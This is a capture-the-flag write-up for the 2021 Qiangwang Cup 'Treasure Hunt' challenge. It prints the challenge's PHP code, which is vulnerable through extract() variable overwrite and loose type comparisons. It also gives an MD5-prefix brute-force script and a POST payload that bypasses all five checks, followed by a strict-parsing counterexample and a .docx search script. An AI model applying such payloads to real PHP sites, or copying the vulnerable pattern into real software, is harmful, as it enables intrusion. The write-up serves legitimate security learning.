2021 強網杯 (Qiangwang Cup) [強網先鋒] 尋寶 (Treasure Hunt)
阿新 • Published: 2021-06-15
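Topics: 1. PHP source code auditing 2. Script writing
The challenge gives us two pieces of information, one for each of two KEYs. Once both KEYs are recovered, the flag can be obtained.
We start with KEY1.
KEY1
Five if checks have to be bypassed to get the flag.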
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);

// Removes every blacklisted substring from the input
function filter($string){
    $filter_word=array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000');
    $filter_phrase='/'.implode('|',$filter_word).'/';
    return preg_replace($filter_phrase,'',$string);
}

if($ppp){
    unset($ppp);
}
$ppp['number1']="1";
$ppp['number2']="1";
$ppp['nunber3']="1";
$ppp['number4']='1';
$ppp['number5']='1';
// extract() lets POST fields overwrite local variables, including $ppp
extract($_POST);
//$num1=$ppp['number1'];
$num1=filter($ppp['number1']);
$num2=filter($ppp['number2']);
$num3=filter($ppp['number3']);
$num4=filter($ppp['number4']);
$num5=filter($ppp['number5']);
var_dump($ppp);
echo "<br>";
var_dump($_POST);

if(isset($num1)&&is_numeric($num1)){
    die("非數字");
}
else{
    if($num1>1024){
        echo "第一層";
        if(isset($num2)&&strlen($num2)<=4&&intval($num2+1)>500000){
            echo "第二層";
            if(isset($num3)&&'4bf21cd'===substr(md5($num3),0,7)){
                echo "第三層";
                if(!($num4<0)&&($num4==0)&&($num4<=0)&&(strlen($num4)>6)&&(strlen($num4)<8)&&isset($num4)){
                    echo "第四層";
                    if(!isset($num5)||(strlen($num5)==0)) die("no");
                    $b=json_decode(@$num5);
                    if($y=$b===NULL){
                        if($y===true){
                            echo "第五層";
                            include 'KeY1lhv.php';
                            echo $KEY1;
                        }
                    }else{
                        die("no");
                    }
                }else{
                    die("no");
                }
            }else{
                die("no");
            }
        }else{
            die("no");
        }
    }else{
        die("no111");
    }
}
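The 2nd and 4th checks can be passed with scientific notation.
The 1st and 5th checks can be passed with weak typing.
The 3rd check needs an input whose MD5 starts with 4bf21cd. The MD5 collision script is as follows: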
import hashlib

payload = 0
md5_value = "4bf21cd"  # required first 7 hex characters of the MD5 digest

while True:
    md5_val = hashlib.md5(str(payload).encode('ascii')).hexdigest()
    if md5_val[:7] == md5_value:
        print(payload)  # an integer whose MD5 starts with the prefix
        break
    payload += 1
payload:
ppp[number1]=1234a&ppp[number2]=9e9&ppp[number3]=61823470&ppp[number4]=0e99999&ppp[number5]=1a
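Why the payload values above pass layers 1, 2, 4 and 5, next to strict parsing that rejects the same values. This is an added example, not the challenge's or the author's code: `loose_layers`, `strict_int` and `is_json_null` are hypothetical names, and it assumes PHP 7.3 or later on a 64-bit build.

```php
<?php
// Added example, not the challenge's code. filter() and the MD5 layer are left out.

// Constructed sample input: the values from the payload above.
$in = ['number1' => '1234a', 'number2' => '9e9', 'number4' => '0e99999', 'number5' => '1a'];

// The challenge's comparisons for layers 1, 2, 4 and 5.
function loose_layers(array $p): array {
    return [
        // '1234a' is not numeric, yet the loose > still ranks it above 1024
        1 => !is_numeric($p['number1']) && $p['number1'] > 1024,
        // '9e9' is 3 characters long but is read as 9000000000 in arithmetic
        2 => strlen($p['number2']) <= 4 && intval($p['number2'] + 1) > 500000,
        // '0e99999' is 7 characters long and is read as the float 0
        4 => !($p['number4'] < 0) && $p['number4'] == 0
             && strlen($p['number4']) > 6 && strlen($p['number4']) < 8,
        // json_decode() returns NULL for invalid JSON as well as for the literal null
        5 => strlen($p['number5']) > 0 && json_decode($p['number5']) === null,
    ];
}

// Hypothetical helper: accept plain decimal digits only, otherwise NULL.
function strict_int(string $s): ?int {
    return (ctype_digit($s) && strlen($s) <= 9) ? (int)$s : null;
}

// Hypothetical helper: TRUE only for the JSON literal null, FALSE for invalid JSON.
function is_json_null(string $s): bool {
    try {
        return json_decode($s, false, 512, JSON_THROW_ON_ERROR) === null;
    } catch (JsonException $e) {
        return false;
    }
}

// Loose comparisons applied to the payload values
var_dump(loose_layers($in));

// Strict parsing of the same values, done before any comparison takes place
foreach (['number1', 'number2', 'number4'] as $k) {
    var_dump(strict_int($in[$k]));
}
var_dump(is_json_null($in['number5']));
```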
KEY2
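import os
import docx

# Walk the two directory levels under five_month and open every file as a .docx
os.chdir('D:/phpstudy_pro/WWW/five_month')
dires = os.listdir()
for dirss in dires:
    os.chdir(f'D:/phpstudy_pro/WWW/five_month/{dirss}')
    dirs = os.listdir()
    for di in dirs:
        os.chdir(f'D:/phpstudy_pro/WWW/five_month/{dirss}/{di}')
        ds = os.listdir()
        for d in ds:
            doc = docx.Document(d)
            for do in doc.paragraphs:
                if "KEY2" in do.text:
                    # Report the file and the paragraph that contains KEY2
                    print(f'five_month/{dirss}/{di}/{d}')
                    print(do.text)
                    break
PS: the script I wrote needs the .png images out of the way, so first use Everything to pull the images out, then run the script. Remember to change the path!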